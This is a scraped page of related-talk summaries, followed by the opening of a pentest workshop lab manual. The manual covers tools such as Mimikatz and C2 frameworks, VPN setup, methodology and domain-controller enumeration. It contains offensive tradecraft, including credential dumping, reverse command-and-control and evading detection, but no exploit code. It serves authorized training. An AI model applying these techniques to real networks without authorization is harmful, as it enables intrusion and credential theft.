Adversary emulation involves leveraging your Red Teams to use real-world adversary tactics, techniques and procedures (TTPs), alongside attack frameworks such as MITRE ATT&CK, to: identify control gaps (and weaknesses); validate your monitoring, detection and response capabilities; and prioritise your security investments towards mitigating any shortcomings observed using this approach.
Metasploit is an open source penetration testing framework that contains tools for scanning systems to identify vulnerabilities, exploits to take advantage of vulnerabilities, and payloads to control systems after exploitation. It provides a simple interface for security professionals to simulate attacks while testing systems and identifying weaknesses. The document discusses Metasploit's history and versions, how it can be used to conduct penetration testing, and key concepts like vulnerabilities, exploits, and payloads.
Vulnerability scanning evaluates an organization's systems and network to identify vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. The document discusses using the Advanced IP Scanner tool to perform a network scan on a target Windows Server 2008 system from a Windows 8 attacker system to check for live systems, open ports, and gather information about computers on the local network. It provides instructions on launching Advanced IP Scanner, entering an IP address range to scan, and viewing the scan results.
Monitoring What Matters: The Prometheus Approach to Whitebox Monitoring (Berl... by Brian Brazil
Prometheus is an open-source monitoring system that allows for whitebox monitoring through metrics collected from inside systems and applications. It provides the ability to alert on high-level symptoms, debug issues through customizable dashboards, and perform complex queries across metrics. Prometheus empowers building monitoring that matters through alerting on important business metrics, gaining insight via dashboards, and integrating with other systems via open interfaces.
The document describes a travel agency management system that offers the following key features:
- Integrated travel agents located directly in companies to make reservations and issue tickets.
- An electronic booking system that is IATA approved along with state-of-the-art technology.
- Dedicated and bilingual staff that provide personalized service and account management for corporate travel needs.
- One-stop shopping for all travel arrangements along with corporate agreements with airlines.
Web application penetration testing lab setup guide by Sudhanshu Chauhan
This document provides guidance on setting up a basic environment for conducting web application penetration testing. It outlines both hardware and software requirements, including recommended tools. It then walks through installing a base OS, browsers, programming languages, web servers, and various security tools. It also provides an overview of the testing process, including information gathering, automated scanning, manual testing, and reporting.
FBI & Secret Service - Business Email Compromise Workshop by Ernest Staats
This document provides information on various open source and low-cost security tools and solutions, including test email servers, phishing training modules, phishing frameworks, password checking tools, email alerts, network mapping tools, and more. It also lists free business intelligence software, and resources on avoiding business email compromise scams.
The document discusses cyber security topics like web security, Zed Attack Proxy (ZAP), SQL injection, Damn Vulnerable Web Application (DVWA), and WebGoat. It provides an overview of these topics, including what ZAP is used for, how to configure it, and how to use its features like intercepting traffic, scanning, and reporting. It also discusses the Open Web Application Security Project (OWASP) and some of the top 10 vulnerabilities like SQL injection.
An Introduction to Prometheus (GrafanaCon 2016) by Brian Brazil
Often what you monitor and get alerted on is defined by your tools, rather than by what makes the most sense to you and your organisation. Alerts on metrics such as CPU usage are noisy and rarely spot real problems, while outages go undetected. Monitoring systems can also be challenging to maintain, and overall provide a poor return on investment.
In the past few years several new monitoring systems have appeared with more powerful semantics and which are easier to run, which offer a way to vastly improve how your organisation operates and prepare you for a Cloud Native environment. Prometheus is one such system. This talk will look at the monitoring ideal and how whitebox monitoring with a time series database, multi-dimensional labels and a powerful querying/alerting language can free you from midnight pages.
Kali Linux is a Debian-based Linux distribution designed for penetration testing and security auditing. It includes over 500 security tools categorized under information gathering, vulnerability analysis, password attacks, wireless attacks, exploitation tools, maintaining access, and more. These tools are maintained by Offensive Security and aim to help security professionals with tasks like scanning, penetration testing, forensics, and reverse engineering.
The development of a product from the point of view of a technician, starting from the concept, passing through the minimum viable product, and ending with the management of a fully operational and deployed app.
This lab document describes using the Metasploit framework to perform exploits against Windows systems. It consists of six sections: installing Metasploit, adding a remote user to Windows XP, gaining remote command shell access to Windows XP, using DLL injection to open a remote VNC connection, remotely installing a rootkit on Windows, and setting up the Metasploit web interface. The document provides background on exploit frameworks and payloads, and guides students through exercises to complete each section.
You are already the Duke of DevOps: you have mastered CI/CD, you have feature teams that include ops skills, your TTM rocks! But you have some difficulties scaling it. You have quality issues, and QoS is at risk. You are quick to adopt practices that increase the flexibility of development and the velocity of deployment. An urgent question follows on the heels of these benefits: how much confidence can we have in the complex systems that we put into production? Let's talk about the next hype of DevOps: SRE, error budgets, continuous quality, observability, Chaos Engineering.
This document provides an introduction and overview of the Kali Linux operating system and the Armitage tool. It discusses how Kali Linux is a Debian-based distribution for penetration testing and security auditing. It then describes Armitage as a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes post-exploitation features. Finally, it provides steps for initializing and implementing Armitage in Kali Linux.
LCP is a password cracking tool that can extract administrator passwords remotely. In this lab, LCP was used to crack the administrator password of a Windows Server 2012 system with IP address WIN-039MR5HL9E4. It retrieved the usernames and passwords of various accounts, including the administrator account. NTFS streams allow files to be hidden by associating them with the main file or directory as an alternate data stream. This lab demonstrates how to hide the calc.exe file in the C:\magic folder using NTFS streams so that it is not normally visible.
This presentation will introduce the Lockheed Martin Cyber Kill Chain and MITRE ATT&CK frameworks. By working through 4 different practical scenarios in a fictional company, https://sensenet-library.com, the attendees will learn how they can use those frameworks to measure their security response in today's diverse security threat landscape. We'll go through categorising security controls, responding to a vulnerability report, assessing a threat intel report, and deciding on the future of the company's toolset, where you will be able to answer whether you should continue investing in a tool or buy a new one.
Spectre and Meltdown are security vulnerabilities that break the isolation between different applications and between applications and the operating system. This allows confidential information like passwords, browser history and banking details to be accessed from other applications. Spectre is more difficult to exploit but also more difficult to mitigate than Meltdown. Software patches have been released to address the issues but they can impact performance, with some applications seeing degradations of 5-30%. Benchmarking tools are being used to better understand and mitigate the performance impacts.
The DevOps paradigm - the evolution of IT professionals and opensource toolkit by Marco Ferrigno
This document discusses the DevOps paradigm and tools. It begins by defining DevOps as focusing on communication and cooperation between development and operations teams. It then discusses concepts like continuous integration, delivery and deployment. It provides examples of tools used in DevOps like Docker, Kubernetes, Ansible, and monitoring tools. It discusses how infrastructure has evolved to be defined through code. Finally, it discusses the challenges of security in DevOps and how DevOps work aligns with open source principles like meritocracy, metrics, and continuous improvement.
This document summarizes the DevOps paradigm and tools. It discusses how DevOps aims to improve communication and cooperation between development and operations teams through practices like continuous integration, delivery, and deployment. It then provides an overview of common DevOps tools for containers, cluster management, automation, CI/CD, monitoring, and infrastructure as code. Specific tools mentioned include Docker, Kubernetes, Ansible, Jenkins, and AWS CloudFormation. The document argues that adopting open source principles and emphasizing leadership, culture change, and talent growth are important for successful DevOps implementation.
Cyber security course in Kerala | C|PENT | Blitz Academy by amallblitz0
Become a skilled cyber security professional in Kerala with the comprehensive C|PENT course at Blitz Academy. Gain hands-on experience and training. Contact now!
https://blitzacademy.org/coursedetail.php?course_cat=9&course_id=2&Certified-Penetration-Testing-Professional-in-kerala
Adding Pentest Sauce to Your Vulnerability Management Recipe. Covers 10 tips to improve vulnerability management based on common red team and pentest findings.
This document provides an overview of SD-WAN and NSX SD-WAN by VeloCloud. It defines SD-WAN as using software and cloud technologies to simplify WAN services delivery to branch offices. Key benefits of SD-WAN include business agility, lower bandwidth costs using internet connectivity, and optimized connections to cloud applications. The document reviews SD-WAN features such as virtualizing networks, enabling secure overlays, and supporting automation through business policies. It provides examples of common business use cases for SD-WAN and contrasts SD-WAN with traditional WAN optimization. Finally, it presents an at-a-glance overview of NSX SD-WAN by VeloCloud's capabilities and
Top 10 Software to Detect & Prevent Security Vulnerabilities from BlackHat US... by Mobodexter
BlackHat USA 2015 recently concluded, and we heard a bunch of news about how BlackHat brought to light various security vulnerabilities in day-to-day life, like the ZigBee protocol, a device for stealing keyless cars, and ATM card skimmers. However, the presenters, who are also ethical hackers, also gave the software community a bunch of tools to help detect and prevent security holes in hardware and software when a product is ready for release. We have reviewed all the presentations from the conference and give you here a list of the Top 10 tools/utilities that help in security vulnerability detection and prevention.
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers by Tom Eston
This document discusses challenges with testing web services and proposes improvements. It notes that current tools, methodologies, and testing environments for assessing web service security are inadequate. The document advocates aligning web service testing with the Penetration Testing Execution Standard methodology. It also highlights new attacks against web services and demos tools like Metasploit modules for assessing web services and the Damn Vulnerable Web Services testing environment.
Fueling AI with Great Data with Airbyte Webinar by Zilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
Similar to Purple Teaming With Adversary Emulation.pdf (20)
TrustArc Webinar - 2024 Global Privacy Survey by TrustArc
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year's report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
Trusted Execution Environment for Decentralized Process Mining by LucaBarbaro3
Presentation of the paper "Trusted Execution Environment for Decentralized Process Mining" given during the CAiSE 2024 Conference in Cyprus on June 7, 2024.
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf by Malak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf by flufftailshop
When it comes to unit testing in the .NET ecosystem, developers have a wide range of options available. Among the most popular choices are NUnit, XUnit, and MSTest. These unit testing frameworks provide essential tools and features to help ensure the quality and reliability of code. However, understanding the differences between these frameworks is crucial for selecting the most suitable one for your projects.
Letter and Document Automation for Bonterra Impact Management (fka Social Sol... by Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on automated letter generation for Bonterra Impact Management using Google Workspace or Microsoft 365.
Interested in deploying letter generation automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx by SitimaJohn
Ocean Lotus cyber threat actors represent a sophisticated, persistent, and politically motivated group that poses a significant risk to organizations and individuals in the Southeast Asian region. Their continuous evolution and adaptability underscore the need for robust cybersecurity measures and international cooperation to identify and mitigate the threats posed by such advanced persistent threat groups.
Dive into the realm of operating systems (OS) with Pravash Chandra Das, a seasoned Digital Forensic Analyst, as your guide. This comprehensive presentation illuminates the core concepts, types, and evolution of OS, essential for understanding modern computing landscapes.
Beginning with the foundational definition, Das clarifies the pivotal role of OS as system software orchestrating hardware resources, software applications, and user interactions. Through succinct descriptions, he delineates the diverse types of OS, from single-user, single-task environments like early MS-DOS iterations, to multi-user, multi-tasking systems exemplified by modern Linux distributions.
Crucial components like the kernel and shell are dissected, highlighting their indispensable functions in resource management and user interface interaction. Das elucidates how the kernel acts as the central nervous system, orchestrating process scheduling, memory allocation, and device management. Meanwhile, the shell serves as the gateway for user commands, bridging the gap between human input and machine execution.
The narrative then shifts to a captivating exploration of prominent desktop OSs: Windows, macOS, and Linux. Windows, with its globally ubiquitous presence and user-friendly interface, emerges as a cornerstone in personal computing history. macOS, lauded for its sleek design and seamless integration with Apple's ecosystem, stands as a beacon of stability and creativity. Linux, an open-source marvel, offers unparalleled flexibility and security, revolutionizing the computing landscape.
Moving to the realm of mobile devices, Das unravels the dominance of Android and iOS. Android's open-source ethos fosters a vibrant ecosystem of customization and innovation, while iOS boasts a seamless user experience and robust security infrastructure. Meanwhile, discontinued platforms like Symbian and Palm OS evoke nostalgia for their pioneering roles in the smartphone revolution.
The journey concludes with a reflection on the ever-evolving landscape of OS, underscored by the emergence of real-time operating systems (RTOS) and the persistent quest for innovation and efficiency. As technology continues to shape our world, understanding the foundations and evolution of operating systems remains paramount. Join Pravash Chandra Das on this illuminating journey through the heart of computing.
Generating privacy-protected synthetic data using Secludy and Milvus (Zilliz)
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
HCL Notes and Domino License Cost Reduction in the World of DLAU (panagenda)
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don't worry, we can help with all of this!
We'll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We'll provide examples and solutions for those as well. And naturally we'll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able to lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you're at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. Weâll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
AI in predictive maintenance: use cases, technologies, benefits ... (leewayhertz.com, alexjohnson7307)
Predictive maintenance is a proactive approach that anticipates equipment failures before they happen. At the forefront of this innovative strategy is Artificial Intelligence (AI), which brings unprecedented precision and efficiency. AI in predictive maintenance is transforming industries by reducing downtime, minimizing costs, and enhancing productivity.
This presentation provides valuable insights into effective cost-saving techniques on AWS. Learn how to optimize your AWS resources by rightsizing, increasing elasticity, picking the right storage class, and choosing the best pricing model. Additionally, discover essential governance mechanisms to ensure continuous cost efficiency. Whether you are new to AWS or an experienced user, this presentation provides clear and practical tips to help you reduce your cloud costs and get the most out of your budget.
Introduction of Cybersecurity with OSS at Code Europe 2024 (Hiroshi SHIBATA)
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
Contents
Introduction 3
Features 3
Purpose 4
Prerequisites and Useful Tools 5
Prerequisite Knowledge 5
Tools 5
How to Connect 7
Methodology Overview 8
Vulnerability Scan vs Pentest (vs Real Attacker) 8
Attack Chain 8
Preparing for a Penetration Test 9
Virtual Machine Updates and Sanitization 9
Host Machine Configuration 9
Reconnaissance and Vulnerability Discovery 10
Initial Enumeration 10
Scanning 11
Manual Information Gathering 14
Unauthenticated Entry Points 15
Easily Guessable FTP 15
SambaCry 15
Missing Windows Patches 18
Phishing 20
Command and Control Infrastructure 24
The following topics will be covered in Part 2 of the workshop:
Privilege Escalation 28
Finding Credentials on a Compromised System 29
Lateral Movement 37
Active Directory 42
Searching for Target Information 56
Introduction
Welcome to your Workshop Lab environment! We're excited to host this environment and have a lot of great content in store for you. What follows in this manual is a description of the lab, the tools and knowledge you'll need to set yourself up for success, and a technical walkthrough that will teach you the skills necessary to perform a complete network penetration test and more.
Features
This lab network has been designed to mirror a legitimate corporate network as closely as possible. Based on our experience conducting internal pentests over the years, we've included core features that help to provide a true representation of the real world.
Windows Active Directory
All Demo environments feature a configured Active Directory (AD) with at least two domains. Larger
labs may have a more sophisticated AD setup that allows an experienced penetration tester to take
advantage of subtle misconfigurations such as domain trust issues. In every lab, AD is used extensively
to manage privilege across the environment. As in the real world, understanding and abusing Active
Directory is a key component of completing a pentest of your lab.
User Simulation
Real networks have active users, and so does your lab! As part of creating this simulated network, we've
developed a PowerShell based tool that will simulate common user behaviors including accessing file
shares, browsing the internet, and opening emails. This means you have additional attack vectors at your
disposal. You can even conduct a full phishing campaign in your lab and use the access obtained to
further compromise the network.
Technical Vulnerabilities
Every network weâve ever encountered, big or small, contains at least a few technical vulnerabilities or
misconfigurations. There are several intentionally vulnerable systems configured throughout your lab
network which will allow you to obtain an initial "foothold" by successfully exploiting the vulnerability.
Network "Trophies"
It's important to demonstrate the impact of a network compromise. In real world engagements, we typically attempt to gain access to critical business data (PII, PCI, HIPAA, etc.) to show the consequences of the vulnerabilities we identify. So, our labs contain examples of sensitive data that you can access to practice "trophy hunting" and proving your impact.
Endpoint Visibility
Corporate networks often have various detection and alerting mechanisms in place. Your lab is deployed
with Splunk to provide endpoint visibility. This allows blue teamers and red teamers alike to learn what
malicious traffic looks like, and how to detect it (or evade detection).
In addition to the core features above, your lab has a few more notable characteristics. First, the entire lab is hosted in the cloud on Amazon's AWS. This ensures reliability and accessibility from anywhere. In addition, your lab network can only be accessed through a certificate-based VPN which was distributed along with this lab manual. Another advantage of hosting the lab infrastructure in AWS manifests itself in our ability to quickly change various configurations across the network. This allows us to easily change how "difficult" the lab is and to simulate more mature organizations with additional network segmentation and defensive controls.
Purpose
There are numerous use cases for your lab, and probably more that we haven't yet considered. We built
your lab with the three following primary use cases in mind:
Pentest / Red Team Training
The main goal of your lab is to help you develop the skills necessary to perform a network penetration
test or red team engagement in the real world, on a live production network. This includes learning how
to identify vulnerabilities, exploit them, and use the access obtained to further compromise the
network. In addition to the lab physically mirroring a corporate network, the methodology used
throughout this manual also mirrors industry standard practices for performing these types of
engagements. After completing this lab, you should have acquired the technical skills and high-level
knowledge to add value to any internal penetration test or red team you participate in.
Pentest / Red Team Technique Development and Practice
This lab also serves as a valuable platform for developing new tradecraft, testing exploits in a safe
environment, and practicing skills you already have. Because of the realistic nature of the lab, and our
ability to customize it to your specific needs, your lab is a powerful tool for any type of penetration
testing or red team activity that you might not want to perform for the first time on a production
network.
Blue Team Lens
Learn what red team activity looks like in a modern detection tool. With the deployment of Splunk
agents across much of the environment, your lab will track events triggered by various testing activities.
Visibility into events triggered by malicious activities helps us to become stealthier and invent new
techniques to bypass detection. Basic alerting also helps to ensure that you are avoiding particularly
risky behavior such as password spraying.
Prerequisites and Useful Tools
While there are no absolute pre-requisites for learning in the lab, there are some fundamental skills that
will speed your progress. To get the most out of your experience, we recommend the following:
Prerequisite Knowledge
A Working Knowledge of Networking Concepts
Your lab simulates a corporate network, so some basic networking skills will go a long way in
understanding various aspects of the penetration testing process. Among the important concepts to be
familiar with are:
TCP/IP: https://technet.microsoft.com/en-us/library/cc786128(v=ws.10).aspx
DNS: https://technet.microsoft.com/en-us/library/cc772774(v=ws.10).aspx
Network Segmentation / Firewalls: https://technet.microsoft.com/en-us/library/cc700820.aspx
An Understanding of Windows Active Directory
A majority of the privilege escalation scenarios encountered in corporate environments involve abusing
Active Directory. Understanding AD and how it manages privilege in a Windows environment is crucial
for effective security testing. We strongly encourage some research into Windows Active Directory if you
have not worked with AD groups or privileges prior to this lab.
Familiarity with the Windows and Linux Operating Systems
A lot of post exploitation activity involves interacting directly through the command line, or through a command and control channel with a similar feel. Knowing your way around the Windows and Linux filesystems, as well as being comfortable with cmd.exe, PowerShell and bash, will smooth your pentesting experience.
Windows Command Line Reference: https://ss64.com/nt/
PowerShell Reference: https://ss64.com/ps/
Linux Bash Reference: https://ss64.com/bash/
Tools
Kali Linux
Kali is a Linux distribution optimized for penetration testing, with an assortment of red team tools installed and configured to make offensive work easier. Older Kali releases even logged you in as root by default; since Kali 2020.1 the default user is unprivileged, so prefix tools that need raw sockets (for example Nmap SYN scans) with sudo. While there are certainly other hacking focused distros out there, Kali is by far the most popular and will be used for examples throughout this lab.
Download: https://www.kali.org/downloads/
Documentation: https://docs.kali.org/
Nmap
Nmap is a port scanner which can identify open ports and running services, fingerprint operating systems, and, through its NSE scripts, check for (and in a few cases exploit) known vulnerabilities. It is great for enumerating targets on a network, as well as checking for common vulnerabilities. It is included in Kali Linux and available through the repositories of most Linux distributions.
Documentation: https://nmap.org/book/man.html
PowerSploit
PowerSploit is a PowerShell toolset with features for all phases of the pentesting process from
reconnaissance to exfiltration. Some of the more popular scripts that you will use in the lab are
PowerView (in the Recon module) and PowerUp (in the Privesc module).
Download: https://github.com/PowerShellMafia/PowerSploit
Mimikatz
Mimikatz is best known for being able to dump Windows credentials from memory. It also contains functions for manipulating tokens, exporting certificates, and controlling services, among others. Mimikatz is included in most post-exploitation frameworks, such as PowerShell Empire, which the examples in this guide will use.
Download: https://github.com/gentilkiwi/mimikatz/releases
Unofficial Guide: https://adsecurity.org/?page_id=1821
Command and Control Channels
Command and control (C2) channels provide remote control over a compromised system. The communication is typically described as "bind", where the compromised host listens for a connection and commands from the operator's server, or "reverse", where the compromised host calls out to the server, which responds with commands. Reverse communication is usually preferable because it is far more likely that the compromised host can reach out past any firewalls to the attacker's server than the other way around.
Here are just a few of the many different options for C2 software. These provide a C2 channel as well as a
post-exploitation framework with numerous functions built in and the ability to create and import new
functionality.
Metasploit's Meterpreter
Metasploit Framework is a platform for penetration testing which includes a multitude of features from scanning to exploitation. It also includes an agent, "Meterpreter", with a C2 channel to communicate over. Meterpreter's network communication is well understood and likely to be detected in monitored environments, so use it with caution.
Guide: https://www.offensive-security.com/metasploit-unleashed/
Documentation: https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework
Cobalt Strike's Beacon
Cobalt Strike provides a post-exploitation agent with advanced C2 channel communication. Malleable C2 profiles allow you to customize how your C2 traffic looks on the network so you can emulate existing threat actors or legitimate website traffic. Cobalt Strike provides an easy to use graphical interface and has a multitude of built in functionality. It's our favorite command and control tool but commands a premium price.
Documentation: https://www.cobaltstrike.com/support
PowerShell Empire Agents
The examples in this lab manual are going to use PowerShell Empire wherever post-exploitation tools
and C2 channels are required. Empire is a pure PowerShell agent, though it does not require
powershell.exe for an agent to run. It features adaptable network communication, encrypted
communication, and an easy to use framework.
Documentation: https://www.powershellempire.com/?page_id=83
Download: https://github.com/EmpireProject/Empire
How to Connect
Connecting to the lab is simple! Along with the lab materials, you should have also received a
connection packet including an OpenVPN configuration file.
Linux
If you're running a Linux based testing VM like Kali, connecting to the lab is as simple as installing OpenVPN and resolvconf (included in most Linux repos) then running OpenVPN to connect with the provided configuration file:
sudo apt-get install openvpn resolvconf
sudo openvpn <linux_client.ovpn>
Windows
If you'd like to connect a Windows system to the lab, you'll need the OpenVPN client for Windows (https://openvpn.net/index.php/open-source/downloads.html). Once installed, put your config file in the "config" directory under your OpenVPN install location (probably C:\Program Files\OpenVPN\config). Then open the GUI, right click on the OpenVPN task bar icon, and select "Connect". More detailed GUI instructions can be found here: https://community.openvpn.net/openvpn/wiki/OpenVPN-GUI
After successfully connecting, you should see an additional network adapter with a 10.9.254.0/24 IP
address.
Methodology Overview
This lab manual attempts to follow an industry standard methodology for penetration testing. Here we
provide an overview of this methodology and its various components.
Vulnerability Scan vs Pentest (vs Real Attacker)
It's important to define what we mean by penetration test, and to differentiate that from a vulnerability
scan and from an attack simulation (or real attacker). A penetration test aims to identify vulnerabilities
and weaknesses in an environment that an attacker could use to gain unauthorized access to resources,
and to prove the impact that these weaknesses could have. To do this, a penetration tester will go
through the steps of an attack from reconnaissance to accessing sensitive resources and data. However,
they are not focused on remaining undetected, or taking the shortest possible path to a target resource;
things that a real attacker or attack simulation would likely aim to do.
A vulnerability scan simply aims to identify the technical vulnerabilities in an environment but does not
go through the act of exploiting any weaknesses or proving impact.
Attack Chain
The "attack chain" consists of the various individual steps taken during a penetration test. These steps are largely agreed upon throughout the industry; however, there are various groupings and granularities implemented across organizations. For the purposes of this lab, we'll assume the following four phases of the attack chain.
Reconnaissance and Vulnerability Discovery
This phase of the attack chain uses discovery and scanning methods to better understand the
environment and identify potentially vulnerable systems and services.
Exploitation: Establishing a Foothold
During exploitation, potential vulnerabilities identified in the previous phase are technically exploited,
giving the attacker some level of access on the network.
Privilege Escalation and Lateral Movement
In this phase of the attack chain, an attacker furthers their access in the environment by compromising
additional systems and using various techniques to gain higher privileges on the network.
Data Exfiltration
Sensitive data is extracted from the environment to systems under the attacker's control, demonstrating the impact of the penetration test.
Preparing for a Penetration Test
Proper preparation before any penetration test is a key factor in success. Below we outline the steps we
generally take before an engagement and suggest you do the same before diving into the lab
environment.
Virtual Machine Updates and Sanitization
The first step we take when preparing for an engagement is to ensure that all our tools and testing
machines are up to date. With Kali, this includes tools and scripts that came prepackaged with the OS as
well as any additional tools we've added. Also, we ensure that our testing virtual machines (VMs) are clean of any prior client data (if you're in the consulting business).
Software Updates
In general, most of the tools in Kali will be updated automatically with system updates. However, some
may need to be manually updated. Be sure to run any update scripts or functions within these tools
before starting any penetration testing. In addition, we always update our testing image.
apt-get update && apt-get upgrade
Sanitizing Client Data
Especially if you are a consultant, you may have performed a previous penetration test or red team
engagement with your testing VM. This means there is a good chance some client specific data was
exfiltrated to your system. If you find yourself on a client network, with different client data sitting on
your VM, this is NOT good. It could even land you in some legal trouble. To avoid this uncomfortable
situation, we take the following steps:
Create a "Clean" Snapshot: On a version of your testing VM which has never touched a client network, preferably a fresh Kali image, perform all the necessary software and system updates. Create a snapshot of this updated and clean virtual machine.
Revert to "Clean" Snapshot: Anytime you are about to go on an engagement, be sure to revert to the latest "clean" snapshot of your testing VM.
Update Tools: Unless you reverted to a clean image you have just created, you'll want to make sure all your tools are up to date. Reperform the software update steps described above.
These steps should guarantee the VM used for testing has no leftover client data from previous tests.
Host Machine Configuration
In most scenarios, your host machine will not be used except in a supporting capacity. In addition, your host probably has some configuration info that may give you away to defenders if leaked on the network (company hostname, unusual network traffic, etc.). For this reason, we always prefer to keep our hosts completely off the network we're assessing. When physically plugging in to a network, you can accomplish this by unbinding the host's own IP stack from the ethernet adapter (on Windows, uncheck IPv4 and IPv6 in the adapter's properties) rather than disabling the adapter outright: the physical NIC has to stay up for the hypervisor's bridged networking to work, and with no host address bound, the only traffic on the wire comes from your testing VM.
Setup Workshop Lab using Snaplabs Environment
The following screenshots (not reproduced in this text) walk you through setting up the workshop lab in the Snaplabs environment.
Setup Wazuh to monitor Network activity
Please view the demo video.
Reconnaissance and Vulnerability Discovery
At the beginning of most penetration tests, you plug into the corporate network and begin the
assessment with no privileges. This portion of the manual will walk you through this scenario and define
a methodology for establishing access and obtaining domain accounts.
Initial Enumeration
The first step after plugging in (or in this case, establishing a VPN connection) is to check your IP configuration. You'll want to make sure you have an internal IP address, like the highlighted network adapter configuration in the slide. Over the VPN you'll notice a "tun0" adapter; the VPN connection creates this additional interface. Plugging into an ethernet jack should instead configure the "eth0" adapter (if DHCP is enabled).
Now that you've successfully obtained an IP address, you'll want to identify some systems on the network. An easy starting point is to perform some network sniffing, or to query for DNS servers and Domain Controllers.
By viewing /etc/resolv.conf, we can see any DNS server or domain settings pushed to our system through DHCP (or by the VPN) when we obtained an IP address.
Take note of the domain and DNS server IP addresses in your favorite note taking tool (OneNote is our go-to). Now that we know the domain, we can query for Domain Controllers as well: every DC registers an LDAP SRV record under the domain, so a simple nslookup can find them for us:
nslookup -q=SRV _ldap._tcp.<fully qualified domain name>
Note these domain controllers as well; we'll be targeting them later! At this point we've identified a subnet of the lab which clearly contains some important servers (10.10.93.0/24). From here we could start port scanning to identify other systems or services, but there is some additional enumeration we can do before we take that step.
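As an added example (not part of the lab manual), the two lookups above can be scripted so the parsing is repeatable: the script below extracts the DHCP-pushed domain and resolvers from a resolv.conf and reduces the nslookup SRV answer to a plain list of domain controller hostnames. Only the enumerate_domain_controllers helper touches the network; the domain corp.local and the 10.10.93.x resolver addresses mentioned in the comments are made-up sample values.

```bash
#!/usr/bin/env bash
# Added example, not part of the lab manual: pull the DHCP-pushed domain and
# DNS servers out of resolv.conf, then resolve the _ldap._tcp SRV record to get
# the domain controllers. The parsers read stdin so they can be checked against
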